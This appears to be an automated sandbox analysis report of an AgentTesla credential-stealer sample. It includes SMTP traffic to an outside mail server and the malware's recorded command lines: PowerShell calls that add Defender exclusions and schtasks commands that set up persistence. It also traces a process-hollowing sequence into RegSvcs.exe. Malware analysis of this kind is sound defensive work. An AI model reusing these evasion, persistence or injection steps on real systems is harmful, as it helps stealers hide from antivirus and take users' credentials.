                                                          Nov 21, 2024 09:05:57.730782986 CET5875000677.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net Ok 1732176357-v5OlBB1OhW20
                                                          Nov 21, 2024 09:05:57.731031895 CET50006587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:05:58.190062046 CET5875000677.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:05:58.190253973 CET50006587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:05:58.649436951 CET5875000677.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:06:05.785904884 CET5875000777.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net Ok 1732176365-56O56L1Oo0U0
                                                          Nov 21, 2024 09:06:05.788331985 CET50007587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:06:06.236552000 CET5875000777.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:06:06.257749081 CET50007587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:06:06.706059933 CET5875000777.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:06:12.938718081 CET5875000877.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net Ok 1732176372-C6O6fq0OouQ0

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:03:02:01
                                                          Start date:21/11/2024
                                                          Path:C:\Users\user\Desktop\datasheet.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\datasheet.exe"
                                                          Imagebase:0x770000
                                                          File size:651'776 bytes
                                                          MD5 hash:4C7E7BD9EAF56B3936BE87A6904F70F8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"
                                                          Imagebase:0xa90000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"
                                                          Imagebase:0xa90000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:03:02:03
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"
                                                          Imagebase:0x100000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:03:02:03
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:03:02:03
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0xdd0000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:03:02:05
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff717f30000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:03:02:05
                                                          Start date:21/11/2024
                                                          Path:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          Imagebase:0x8f0000
                                                          File size:651'776 bytes
                                                          MD5 hash:4C7E7BD9EAF56B3936BE87A6904F70F8
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 55%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"
                                                          Imagebase:0x100000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0x160000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0x9b0000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:11%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:3.5%
                                                            Total number of Nodes:228
                                                            Total number of Limit Nodes:14
                                                            execution_graph 31102 2b3d3c0 31103 2b3d406 GetCurrentProcess 31102->31103 31105 2b3d451 31103->31105 31106 2b3d458 GetCurrentThread 31103->31106 31105->31106 31107 2b3d495 GetCurrentProcess 31106->31107 31108 2b3d48e 31106->31108 31109 2b3d4cb 31107->31109 31108->31107 31110 2b3d4f3 GetCurrentThreadId 31109->31110 31111 2b3d524 31110->31111 31010 7c00f98 31011 7c00fbe 31010->31011 31012 7c01123 31010->31012 31011->31012 31015 7c01210 31011->31015 31018 7c01218 PostMessageW 31011->31018 31016 7c01218 PostMessageW 31015->31016 31017 7c01284 31016->31017 31017->31011 31019 7c01284 31018->31019 31019->31011 31112 724d0dc 31114 724cfce 31112->31114 31113 724d05f 31114->31113 31115 724faf8 12 API calls 31114->31115 31116 724fae9 12 API calls 31114->31116 31115->31113 31116->31113 30823 724d1ef 30824 724cfce 30823->30824 30825 724d05f 30824->30825 30828 724faf8 30824->30828 30848 724fae9 30824->30848 30829 724fb12 30828->30829 30837 724fb1a 30829->30837 30868 7c00040 30829->30868 30873 7c001f7 30829->30873 30878 7c00796 30829->30878 30882 7c003f4 30829->30882 30887 7c00192 30829->30887 30892 7c00311 30829->30892 30896 7c00b11 30829->30896 30901 7c002d1 30829->30901 30908 7c00170 30829->30908 30913 7c0028d 30829->30913 30917 7c0080d 30829->30917 30922 7c00348 30829->30922 30926 7c00007 30829->30926 30931 7c002c6 30829->30931 30939 7c005e2 30829->30939 30944 7c00721 30829->30944 30948 7c004a0 30829->30948 30837->30825 30849 724faf8 30848->30849 30850 7c00040 2 API calls 30849->30850 30851 7c004a0 2 API calls 30849->30851 30852 7c00721 2 API calls 30849->30852 30853 7c005e2 2 API calls 30849->30853 30854 7c002c6 4 API calls 30849->30854 30855 7c00007 2 API calls 30849->30855 30856 7c00348 2 API calls 30849->30856 30857 724fb1a 30849->30857 30858 7c0080d 2 API calls 30849->30858 30859 7c0028d 2 API calls 30849->30859 30860 7c00170 2 API calls 30849->30860 30861 7c002d1 4 API calls 30849->30861 30862 7c00b11 2 API calls 30849->30862 30863 7c00311 2 API calls 30849->30863 30864 7c00192 2 API calls 30849->30864 30865 7c003f4 2 API calls 30849->30865 30866 7c00796 2 API calls 30849->30866 30867 7c001f7 2 API calls 30849->30867 30850->30857 30851->30857 30852->30857 30853->30857 30854->30857 30855->30857 30856->30857 30857->30825 30858->30857 30859->30857 30860->30857 30861->30857 30862->30857 30863->30857 30864->30857 30865->30857 30866->30857 30867->30857 30870 7c00073 30868->30870 30869 7c00266 30869->30837 30870->30869 30952 724cbb6 30870->30952 30956 724cbb8 30870->30956 30874 7c001fb 30873->30874 30960 724c930 30874->30960 30964 724c928 30874->30964 30875 7c0022a 30875->30837 30879 7c00722 30878->30879 30879->30878 30968 724be71 30879->30968 30972 724be78 30879->30972 30883 7c00958 30882->30883 30976 724ca20 30883->30976 30980 724ca1a 30883->30980 30884 7c0097a 30888 7c001a2 30887->30888 30890 724c930 WriteProcessMemory 30888->30890 30891 724c928 WriteProcessMemory 30888->30891 30889 7c0022a 30889->30837 30890->30889 30891->30889 30893 7c0031e 30892->30893 30894 724be71 ResumeThread 30893->30894 30895 724be78 ResumeThread 30893->30895 30894->30893 30895->30893 30897 7c000fe 30896->30897 30898 7c00266 30897->30898 30899 724cbb6 CreateProcessA 30897->30899 30900 724cbb8 CreateProcessA 30897->30900 30898->30837 30899->30897 30900->30897 30906 724c930 WriteProcessMemory 30901->30906 30907 724c928 WriteProcessMemory 30901->30907 30902 7c00178 30903 7c00166 30903->30902 30984 724c790 30903->30984 30988 724c798 30903->30988 30906->30903 30907->30903 30909 7c00166 30908->30909 30910 7c00178 30909->30910 30911 724c790 Wow64SetThreadContext 30909->30911 30912 724c798 Wow64SetThreadContext 30909->30912 30911->30909 30912->30909 30914 7c002a7 30913->30914 30915 724be71 ResumeThread 30914->30915 30916 724be78 ResumeThread 30914->30916 30915->30914 30916->30914 30918 7c00813 30917->30918 30920 724c930 WriteProcessMemory 30918->30920 30921 724c928 WriteProcessMemory 30918->30921 30919 7c00939 30920->30919 30921->30919 30924 724c790 Wow64SetThreadContext 30922->30924 30925 724c798 Wow64SetThreadContext 30922->30925 30923 7c00362 30924->30923 30925->30923 30927 7c00040 30926->30927 30928 7c00266 30927->30928 30929 724cbb6 CreateProcessA 30927->30929 30930 724cbb8 CreateProcessA 30927->30930 30928->30837 30929->30927 30930->30927 30932 7c0046f 30931->30932 30992 7c00dc8 30932->30992 30997 7c00dd8 30932->30997 30933 7c0048b 30937 724c930 WriteProcessMemory 30933->30937 30938 724c928 WriteProcessMemory 30933->30938 30934 7c00939 30937->30934 30938->30934 30940 7c00166 30939->30940 30940->30939 30941 7c00178 30940->30941 30942 724c790 Wow64SetThreadContext 30940->30942 30943 724c798 Wow64SetThreadContext 30940->30943 30942->30940 30943->30940 30945 7c00722 30944->30945 30946 724be71 ResumeThread 30945->30946 30947 724be78 ResumeThread 30945->30947 30946->30945 30947->30945 30949 7c0028c 30948->30949 30950 724be71 ResumeThread 30949->30950 30951 724be78 ResumeThread 30949->30951 30950->30949 30951->30949 30953 724cbb8 CreateProcessA 30952->30953 30955 724ce03 30953->30955 30955->30955 30957 724cc41 CreateProcessA 30956->30957 30959 724ce03 30957->30959 30959->30959 30961 724c978 WriteProcessMemory 30960->30961 30963 724c9cf 30961->30963 30963->30875 30965 724c930 WriteProcessMemory 30964->30965 30967 724c9cf 30965->30967 30967->30875 30969 724be74 ResumeThread 30968->30969 30971 724bee9 30969->30971 30971->30879 30973 724be79 ResumeThread 30972->30973 30975 724bee9 30973->30975 30975->30879 30977 724ca6b ReadProcessMemory 30976->30977 30979 724caaf 30977->30979 30979->30884 30981 724ca20 ReadProcessMemory 30980->30981 30983 724caaf 30981->30983 30983->30884 30985 724c7dd Wow64SetThreadContext 30984->30985 30987 724c825 30985->30987 30987->30903 30989 724c7dd Wow64SetThreadContext 30988->30989 30991 724c825 30989->30991 30991->30903 30993 7c00dd8 30992->30993 31002 724c870 30993->31002 31006 724c868 30993->31006 30994 7c00e0c 30994->30933 30998 7c00ded 30997->30998 31000 724c870 VirtualAllocEx 30998->31000 31001 724c868 VirtualAllocEx 30998->31001 30999 7c00e0c 30999->30933 31000->30999 31001->30999 31003 724c8a6 VirtualAllocEx 31002->31003 31005 724c8ed 31003->31005 31005->30994 31007 724c86f VirtualAllocEx 31006->31007 31009 724c8ed 31007->31009 31009->30994 31020 2b34668 31021 2b3467a 31020->31021 31022 2b34686 31021->31022 31026 2b34778 31021->31026 31031 2b33e40 31022->31031 31024 2b346a5 31027 2b3479d 31026->31027 31035 2b34879 31027->31035 31039 2b34888 31027->31039 31032 2b33e4b 31031->31032 31047 2b35e4c 31032->31047 31034 2b3706f 31034->31024 31036 2b348af 31035->31036 31037 2b3498c 31036->31037 31043 2b344c4 31036->31043 31041 2b348af 31039->31041 31040 2b3498c 31040->31040 31041->31040 31042 2b344c4 CreateActCtxA 31041->31042 31042->31040 31044 2b35918 CreateActCtxA 31043->31044 31046 2b359db 31044->31046 31048 2b35e57 31047->31048 31051 2b35e6c 31048->31051 31050 2b3751d 31050->31034 31052 2b35e77 31051->31052 31055 2b370a4 31052->31055 31054 2b375fa 31054->31050 31056 2b370af 31055->31056 31059 2b370d4 31056->31059 31058 2b376ed 31058->31054 31061 2b370df 31059->31061 31060 2b38991 31060->31058 31062 2b38953 31061->31062 31065 2b3b001 31061->31065 31062->31060 31069 2b3d0e8 31062->31069 31074 2b3b027 31065->31074 31078 2b3b038 31065->31078 31066 2b3b016 31066->31062 31070 2b3d119 31069->31070 31071 2b3d13d 31070->31071 31086 2b3d297 31070->31086 31090 2b3d2a8 31070->31090 31071->31060 31075 2b3b038 31074->31075 31081 2b3b130 31075->31081 31076 2b3b047 31076->31066 31080 2b3b130 GetModuleHandleW 31078->31080 31079 2b3b047 31079->31066 31080->31079 31082 2b3b164 31081->31082 31083 2b3b141 31081->31083 31082->31076 31083->31082 31084 2b3b368 GetModuleHandleW 31083->31084 31085 2b3b395 31084->31085 31085->31076 31087 2b3d2b5 31086->31087 31089 2b3d2ef 31087->31089 31094 2b3ce10 31087->31094 31089->31071 31092 2b3d2b5 31090->31092 31091 2b3d2ef 31091->31071 31092->31091 31093 2b3ce10 GetModuleHandleW 31092->31093 31093->31091 31095 2b3ce1b 31094->31095 31097 2b3dc00 31095->31097 31098 2b3cf3c 31095->31098 31097->31097 31099 2b3cf47 31098->31099 31100 2b370d4 GetModuleHandleW 31099->31100 31101 2b3dc6f 31100->31101 31101->31097 31117 2b3d608 DuplicateHandle 31118 2b3d69e 31117->31118

                                                            Executed Functions

                                                            Function 07C01EC8 Relevance: .4, Instructions: 407COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebb3fa80cd66379855105cb84fb71d8a9f31452214449e686573b6864bc1d403
                                                            • Instruction ID: de8047ab9fa36541fbb3ae700f160882f12a990d5d67ebf07494b083fc68e530
                                                            • Opcode Fuzzy Hash: ebb3fa80cd66379855105cb84fb71d8a9f31452214449e686573b6864bc1d403
                                                            • Instruction Fuzzy Hash: F9E19EB17016058FDB26DB75C4A4BAEB7F7AF89300F2484A9D1869B6D0CB35D901CBD1
                                                            Function 07C00040 Relevance: .2, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ae2a3697f9656220e39cf64e1ea070b12d813a70306ae91a062726fb50834d3
                                                            • Instruction ID: 0c6ad86c26f34601b4f4c40fd26543203ba51ab56235ba87bbbac1694432a64b
                                                            • Opcode Fuzzy Hash: 7ae2a3697f9656220e39cf64e1ea070b12d813a70306ae91a062726fb50834d3
                                                            • Instruction Fuzzy Hash: E8710AB1D44629CBDB68CF66C8447E9F7B6BF89300F14D1AAD40DA6290EB705AC5CF80
                                                            Function 07C0032D Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f29ba0e028c5b9776402e5b8415fbffafe6a830017b70cbd52c0513ce288907
                                                            • Instruction ID: 608881d22bb279c152713e5f5c75effc1d96086ab23889d1fa49e555f57cf6bd
                                                            • Opcode Fuzzy Hash: 4f29ba0e028c5b9776402e5b8415fbffafe6a830017b70cbd52c0513ce288907
                                                            • Instruction Fuzzy Hash: FBF0A0B4D9D108CFC7108B41E8842F8BBB8EB4B315F0670E2C90E93293DB3456868BD1
                                                            Function 02B3D3B0 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D43E
                                                            • GetCurrentThread.KERNEL32 ref: 02B3D47B
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D4B8
                                                            • GetCurrentThreadId.KERNEL32 ref: 02B3D511
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: d46a1174ce104f55d5dc2adb117d80af5bee4486da022ed21d166fe5d29d5592
                                                            • Instruction ID: 499d0558541254a2888f9932710fc3322a57613fd3dc3d773aa98c76d4fd14c7
                                                            • Opcode Fuzzy Hash: d46a1174ce104f55d5dc2adb117d80af5bee4486da022ed21d166fe5d29d5592
                                                            • Instruction Fuzzy Hash: 335177B1A0134ACFDB04CFAAD548B9EBBF1EF88318F248599E108A7350DB746945CF61
                                                            Function 02B3D3C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D43E
                                                            • GetCurrentThread.KERNEL32 ref: 02B3D47B
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D4B8
                                                            • GetCurrentThreadId.KERNEL32 ref: 02B3D511
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: e836222ce40b55aa77ce36a1929fff7721dca0a2aa5282a8e317bc2ee24faf24
                                                            • Instruction ID: d782a8e180b4ca75a7d231d0bf90495e837f1269f40a9b8b3706da23442bee56
                                                            • Opcode Fuzzy Hash: e836222ce40b55aa77ce36a1929fff7721dca0a2aa5282a8e317bc2ee24faf24
                                                            • Instruction Fuzzy Hash: 095177B190034ACFDB04DFAAD548B9EBBF1EF88318F248599E009A7350DB74A944CF65
                                                            Function 02B3B130 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 45 2b3b130-2b3b13f 46 2b3b141-2b3b14e call 2b3aaf4 45->46 47 2b3b16b-2b3b16f 45->47 54 2b3b150 46->54 55 2b3b164 46->55 49 2b3b183-2b3b1c4 47->49 50 2b3b171-2b3b17b 47->50 56 2b3b1d1-2b3b1df 49->56 57 2b3b1c6-2b3b1ce 49->57 50->49 101 2b3b156 call 2b3b3bb 54->101 102 2b3b156 call 2b3b3c8 54->102 55->47 58 2b3b203-2b3b205 56->58 59 2b3b1e1-2b3b1e6 56->59 57->56 64 2b3b208-2b3b20f 58->64 61 2b3b1f1 59->61 62 2b3b1e8-2b3b1ef call 2b3ab00 59->62 60 2b3b15c-2b3b15e 60->55 63 2b3b2a0-2b3b360 60->63 68 2b3b1f3-2b3b201 61->68 62->68 96 2b3b362-2b3b365 63->96 97 2b3b368-2b3b393 GetModuleHandleW 63->97 65 2b3b211-2b3b219 64->65 66 2b3b21c-2b3b223 64->66 65->66 69 2b3b230-2b3b239 call 2b3ab10 66->69 70 2b3b225-2b3b22d 66->70 68->64 76 2b3b246-2b3b24b 69->76 77 2b3b23b-2b3b243 69->77 70->69 78 2b3b269-2b3b276 76->78 79 2b3b24d-2b3b254 76->79 77->76 85 2b3b299-2b3b29f 78->85 86 2b3b278-2b3b296 78->86 79->78 81 2b3b256-2b3b266 call 2b3ab20 call 2b3ab30 79->81 81->78 86->85 96->97 98 2b3b395-2b3b39b 97->98 99 2b3b39c-2b3b3b0 97->99 98->99 101->60 102->60
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02B3B386
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID: 0O$0O
                                                            • API String ID: 4139908857-234839962
                                                            • Opcode ID: 23eb2946ea65f86c2db221ed610cf72f4890787c76ebdd8eea81d2917853dd8a
                                                            • Instruction ID: fa23a616b4ceea0dc6084d896837db6dbed5a47106d1e45126e0d09c2bcd2360
                                                            • Opcode Fuzzy Hash: 23eb2946ea65f86c2db221ed610cf72f4890787c76ebdd8eea81d2917853dd8a
                                                            • Instruction Fuzzy Hash: A2714470A00B058FD725DF6AD44475ABBF1FF88308F108A6ED48AD7A44DB74E845CB91
                                                            Function 0724CBB6 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
